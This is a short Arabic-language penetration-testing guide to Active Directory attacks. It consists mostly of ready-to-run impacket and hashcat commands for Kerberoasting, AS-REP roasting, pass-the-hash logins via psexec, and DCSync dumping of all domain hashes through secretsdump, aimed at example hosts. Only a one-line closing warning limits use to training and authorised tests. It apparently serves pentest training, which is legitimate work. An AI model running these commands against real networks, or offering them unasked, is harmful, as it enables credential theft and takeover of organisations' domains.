معظم اختبارات الاختراق الداخلية تنتهي باستهداف الأكتيف داريكتوري. هذا الدليل يغطي أهم الهجمات.
هجمات الكيربيروس
Kerberoasting
يستهدف هذا الهجوم حسابات الخدمات (SPNs) لاستخراج تذاكرها وكسرها offline.
# استخراج تذاكر حسابات الخدمات
impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.10.10.1 -request -outputfile hashes.txt
# كسر الهاش
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
AS-REP Roasting
يستهدف الحسابات التي تم إيقاف Pre-Authentication عليها.
# البحث عن الحسابات الضعيفة
impacket-GetNPUsers corp.local/ -dc-ip 10.10.10.1 -no-pass -usersfile users.txt
تصعيد الصلاحيات في الأكتيف داريكتوري
Pass-the-Hash
# تمرير الهاش للوصول لجهاز آخر
impacket-psexec -hashes :NTLM_HASH Administrator@10.10.10.2
DCSync — سرقة جميع الهاشات
# يتطلب صلاحيات Domain Admin أو DCSync
impacket-secretsdump corp.local/admin:pass@dc.corp.local -just-dc
تحذير: استخدم هذه الأدوات في بيئات مخصصة للتدريب والاختبار المرخص فقط.